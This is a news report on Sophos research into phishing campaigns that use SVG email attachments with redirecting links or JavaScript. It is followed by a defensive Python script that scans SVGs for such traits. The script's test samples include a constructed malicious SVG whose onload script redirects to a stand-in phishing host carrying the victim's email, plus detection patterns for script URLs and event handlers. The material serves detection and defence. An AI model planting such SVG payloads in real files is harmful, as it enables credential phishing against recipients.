Sophos posts research on new SVG phishing cyberthreat

Sophos X-Ops, the threat research unit of Sophos, has posted research on a new phishing cyberthreat that is exploiting the Scalable Vector Graphics (SVG) file format.

According to Sophos, cybercriminals increasingly leverage SVG files—a graphics format containing XML-like text instructions—to evade anti-phishing and anti-spam protections.

The research, published recently, reveals that phishing gangs have adopted a technique of sending weaponised SVG files as email attachments since late last year. These files, when opened, redirect victims to malicious sites hosting phishing kits, posing significant risks to individuals and organisations alike, says Sophos.

As per the research by Sophos, this is how the attacks work: Cybercriminals send emails with SVG file attachments to their targets. The SVG file, when clicked, opens in the target's browser by default. The file contains embedded links or JavaScript that redirects the browser to a phishing site. Victims are presented with fake prompts, such as requests to open a document hosted on platforms like DocuSign, Dropbox, or SharePoint, or to listen to a voicemail message via Google Voice.

Sophos X-Ops says that it has also discovered that nearly half of the SVG files analysed were highly customised, with the target's email address or name embedded directly into the file. This level of personalisation suggests these attacks are being used for targeted campaigns against specific companies, says Sophos.
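
For mail-security teams, the traits described above (embedded links or JavaScript in the attachment, and the target's address written into the file) can be checked before an SVG reaches a browser. The following triage sketch is an added example, not code from Sophos or its research; the function names, finding labels and sample files are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
REMOTE_SCHEMES = ("http:", "https:", "//")
SCRIPT_SCHEMES = ("javascript:", "data:text/html")

def local(name):
    """Drop the XML namespace and case: '{ns}href' -> 'href'."""
    return name.rsplit("}", 1)[-1].lower()

def triage_svg(svg_text, recipient=None):
    """Return sorted findings for one SVG attachment (empty list = nothing flagged)."""
    if re.search(r"<!\s*(DOCTYPE|ENTITY)", svg_text, re.I):
        return ["dtd-present"]  # refuse to parse: avoids entity-expansion tricks
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError:
        return ["malformed-xml"]
    findings = set()
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.add(f"active-element:{tag}")
        for name, value in el.attrib.items():
            attr, val = local(name), value.strip().lower()
            if attr.startswith("on"):  # onload, onclick, ...
                findings.add(f"event-handler:{attr}")
            elif attr in ("href", "src"):
                if val.startswith(SCRIPT_SCHEMES):
                    findings.add(f"script-url:{tag}")
                elif val.startswith(REMOTE_SCHEMES):
                    findings.add(f"external-url:{tag}")
    # Personalisation check: is the recipient's own address inside the file?
    if recipient and recipient.lower() in svg_text.lower():
        findings.add("recipient-embedded")
    return sorted(findings)

# Constructed samples (not taken from the Sophos research).
NS = 'xmlns="http://www.w3.org/2000/svg"'
BENIGN = f'<svg {NS}><rect width="10" height="10"/></svg>'
LINK = (f'<svg {NS} xmlns:xlink="http://www.w3.org/1999/xlink">'
        '<a xlink:href="https://login.phish.example/doc"><text>Open</text></a></svg>')
SCRIPT = (f'<svg {NS} onload="go()"><script>'
          "location='https://phish.example/?u=alice@corp.example'</script></svg>")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("link", LINK), ("script", SCRIPT)):
        print(label, triage_svg(doc, recipient="alice@corp.example"))
```

Any finding on an emailed SVG is a reason to quarantine or strip the attachment, since ordinary image artwork rarely needs scripts, event handlers or outbound links.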